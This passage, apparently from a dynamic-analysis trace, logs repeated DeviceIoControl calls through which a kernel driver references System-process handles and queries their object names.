Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006934a820, HandleInformation=0x0) returned 0x0 [0288.613] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.613] PsReleaseProcessExitSynchronization () returned 0x2 [0288.613] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d5 [0288.613] ObQueryNameString (in: Object=0xffffe0006934a820, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.613] ObfDereferenceObject (Object=0xffffe0006934a820) returned 0x7fff [0288.613] IoCompleteRequest () returned 0x0 [0288.613] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa0, lpOverlapped=0x0) returned 1 [0288.613] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.613] PsAcquireProcessExitSynchronization () returned 0x0 [0288.613] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.613] ObReferenceObjectByHandle (in: Handle=0xffffffff80000274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694b9390, HandleInformation=0x0) returned 0x0 [0288.613] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.613] PsReleaseProcessExitSynchronization () returned 0x2 [0288.613] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d4 [0288.613] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.613] ObfDereferenceObject (Object=0xffffe000694b9390) returned 0x7ff1 [0288.613] IoCompleteRequest () returned 0x0 [0288.613] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x80, lpOverlapped=0x0) returned 1 [0288.613] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.613] PsAcquireProcessExitSynchronization () returned 0x0 [0288.613] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.613] ObReferenceObjectByHandle (in: Handle=0xffffffff8000027c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069574b70, HandleInformation=0x0) returned 0x0 [0288.613] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.613] PsReleaseProcessExitSynchronization () returned 0x2 [0288.613] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d3 [0288.613] ObQueryNameString (in: Object=0xffffe00069574b70, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.613] ObfDereferenceObject (Object=0xffffe00069574b70) returned 0x7fee [0288.613] IoCompleteRequest () returned 0x0 [0288.613] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x80, lpOverlapped=0x0) returned 1 [0288.613] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.613] PsAcquireProcessExitSynchronization () returned 0x0 [0288.613] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.613] ObReferenceObjectByHandle (in: Handle=0xffffffff80000280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007bc02450, HandleInformation=0x0) returned 0x0 [0288.613] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.613] PsReleaseProcessExitSynchronization () returned 0x2 [0288.613] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d2 [0288.613] ObQueryNameString (in: Object=0xffffe0007bc02450, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.613] ObfDereferenceObject (Object=0xffffe0007bc02450) returned 0x7ffc [0288.613] IoCompleteRequest () returned 0x0 [0288.614] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xcc, lpOverlapped=0x0) returned 1 [0288.614] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.614] PsAcquireProcessExitSynchronization () returned 0x0 [0288.614] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.614] ObReferenceObjectByHandle (in: Handle=0xffffffff80000288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069546530, HandleInformation=0x0) returned 0x0 [0288.614] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.614] PsReleaseProcessExitSynchronization () returned 0x2 [0288.614] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d1 [0288.614] ObQueryNameString (in: Object=0xffffe00069546530, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.614] ObfDereferenceObject (Object=0xffffe00069546530) returned 0x7fff [0288.614] IoCompleteRequest () returned 0x0 [0288.614] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x116, lpOverlapped=0x0) returned 1 [0288.614] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.614] PsAcquireProcessExitSynchronization () returned 0x0 [0288.614] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.614] ObReferenceObjectByHandle (in: Handle=0xffffffff8000028c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000695743c0, HandleInformation=0x0) returned 0x0 [0288.614] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.614] PsReleaseProcessExitSynchronization () returned 0x2 [0288.614] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8d0 [0288.614] ObQueryNameString (in: Object=0xffffe000695743c0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.614] ObfDereferenceObject (Object=0xffffe000695743c0) returned 0x7fff [0288.614] IoCompleteRequest () returned 0x0 [0288.614] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x116, lpOverlapped=0x0) returned 1 [0288.614] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.614] PsAcquireProcessExitSynchronization () returned 0x0 [0288.614] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.614] ObReferenceObjectByHandle (in: Handle=0xffffffff80000290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069548430, HandleInformation=0x0) returned 0x0 [0288.614] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.614] PsReleaseProcessExitSynchronization () returned 0x2 [0288.614] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8cf [0288.614] ObQueryNameString (in: Object=0xffffe00069548430, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.614] ObfDereferenceObject (Object=0xffffe00069548430) returned 0x7fff [0288.614] IoCompleteRequest () returned 0x0 [0288.614] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.614] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.614] PsAcquireProcessExitSynchronization () returned 0x0 [0288.614] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.614] ObReferenceObjectByHandle (in: Handle=0xffffffff80000298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069548cd0, HandleInformation=0x0) returned 0x0 [0288.614] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.615] PsReleaseProcessExitSynchronization () returned 0x2 [0288.615] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ce [0288.615] ObQueryNameString (in: Object=0xffffe00069548cd0, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.615] ObfDereferenceObject (Object=0xffffe00069548cd0) returned 0x7ffe [0288.615] IoCompleteRequest () returned 0x0 [0288.615] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.615] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.615] PsAcquireProcessExitSynchronization () returned 0x0 [0288.615] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.615] ObReferenceObjectByHandle (in: Handle=0xffffffff8000029c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069548a60, HandleInformation=0x0) returned 0x0 [0288.615] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.615] PsReleaseProcessExitSynchronization () returned 0x2 [0288.615] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8cd [0288.615] ObQueryNameString (in: Object=0xffffe00069548a60, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.615] ObfDereferenceObject (Object=0xffffe00069548a60) returned 0x7fff [0288.615] IoCompleteRequest () returned 0x0 [0288.615] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0288.615] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.615] PsAcquireProcessExitSynchronization () returned 0x0 [0288.615] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.615] ObReferenceObjectByHandle (in: Handle=0xffffffff800002a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693e7090, HandleInformation=0x0) returned 0x0 [0288.615] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.615] PsReleaseProcessExitSynchronization () returned 0x2 [0288.615] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8cc [0288.615] ObQueryNameString (in: Object=0xffffe000693e7090, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.615] ObfDereferenceObject (Object=0xffffe000693e7090) returned 0x7ffd [0288.615] IoCompleteRequest () returned 0x0 [0288.615] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x78, lpOverlapped=0x0) returned 1 [0288.615] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.615] PsAcquireProcessExitSynchronization () returned 0x0 [0288.615] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.615] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069533830, HandleInformation=0x0) returned 0x0 [0288.615] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.615] PsReleaseProcessExitSynchronization () returned 0x2 [0288.615] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8cb [0288.615] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.615] ObfDereferenceObject (Object=0xffffe00069533830) returned 0x7f1c [0288.615] IoCompleteRequest () returned 0x0 [0288.615] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x88, lpOverlapped=0x0) returned 1 [0288.615] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.616] PsAcquireProcessExitSynchronization () returned 0x0 [0288.616] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.616] ObReferenceObjectByHandle (in: Handle=0xffffffff800002ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000730deca0, HandleInformation=0x0) returned 0x0 [0288.616] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.616] PsReleaseProcessExitSynchronization () returned 0x2 [0288.616] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ca [0288.616] ObQueryNameString (in: Object=0xffffe000730deca0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.616] ObfDereferenceObject (Object=0xffffe000730deca0) returned 0x7fff [0288.616] IoCompleteRequest () returned 0x0 [0288.616] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0288.616] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.616] PsAcquireProcessExitSynchronization () returned 0x0 [0288.616] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.616] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069533570, HandleInformation=0x0) returned 0x0 [0288.616] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.616] PsReleaseProcessExitSynchronization () returned 0x2 [0288.616] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c9 [0288.616] ObQueryNameString (in: Object=0xffffe00069533570, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.616] ObfDereferenceObject (Object=0xffffe00069533570) returned 0x7ff9 [0288.616] IoCompleteRequest () returned 0x0 [0288.616] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0288.616] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.616] PsAcquireProcessExitSynchronization () returned 0x0 [0288.616] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.616] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000695332b0, HandleInformation=0x0) returned 0x0 [0288.616] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.616] PsReleaseProcessExitSynchronization () returned 0x2 [0288.616] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c8 [0288.616] ObQueryNameString (in: Object=0xffffe000695332b0, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.616] ObfDereferenceObject (Object=0xffffe000695332b0) returned 0x7ffc [0288.616] IoCompleteRequest () returned 0x0 [0288.616] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8c, lpOverlapped=0x0) returned 1 [0288.616] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.616] PsAcquireProcessExitSynchronization () returned 0x0 [0288.616] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.616] ObReferenceObjectByHandle (in: Handle=0xffffffff80000340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067ebb090, HandleInformation=0x0) returned 0x0 [0288.616] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.616] PsReleaseProcessExitSynchronization () returned 0x2 [0288.616] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c7 [0288.616] ObQueryNameString (in: Object=0xffffe00067ebb090, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.616] ObfDereferenceObject (Object=0xffffe00067ebb090) returned 0x800e [0288.616] IoCompleteRequest () returned 0x0 [0288.617] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2a, lpOverlapped=0x0) returned 1 [0288.617] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.617] PsAcquireProcessExitSynchronization () returned 0x0 [0288.617] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.617] ObReferenceObjectByHandle (in: Handle=0xffffffff80000478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e59240, HandleInformation=0x0) returned 0x0 [0288.617] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.617] PsReleaseProcessExitSynchronization () returned 0x2 [0288.617] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c6 [0288.617] ObQueryNameString (in: Object=0xffffe00067e59240, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.617] ObfDereferenceObject (Object=0xffffe00067e59240) returned 0x7ff2 [0288.617] IoCompleteRequest () returned 0x0 [0288.617] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2a, lpOverlapped=0x0) returned 1 [0288.617] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.617] PsAcquireProcessExitSynchronization () returned 0x0 [0288.617] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.617] ObReferenceObjectByHandle (in: Handle=0xffffffff80000494, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696c4090, HandleInformation=0x0) returned 0x0 [0288.617] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.617] PsReleaseProcessExitSynchronization () returned 0x2 [0288.617] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c5 [0288.617] ObQueryNameString (in: Object=0xffffe000696c4090, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.617] ObfDereferenceObject (Object=0xffffe000696c4090) returned 0x7ff9 [0288.617] IoCompleteRequest () returned 0x0 [0288.617] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8a, lpOverlapped=0x0) returned 1 [0288.617] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.617] PsAcquireProcessExitSynchronization () returned 0x0 [0288.617] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.617] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693de980, HandleInformation=0x0) returned 0x0 [0288.617] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.617] PsReleaseProcessExitSynchronization () returned 0x2 [0288.617] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c4 [0288.617] ObQueryNameString (in: Object=0xffffe000693de980, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.617] ObfDereferenceObject (Object=0xffffe000693de980) returned 0x7fff [0288.617] IoCompleteRequest () returned 0x0 [0288.617] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.617] PsLookupProcessByProcessId (in: 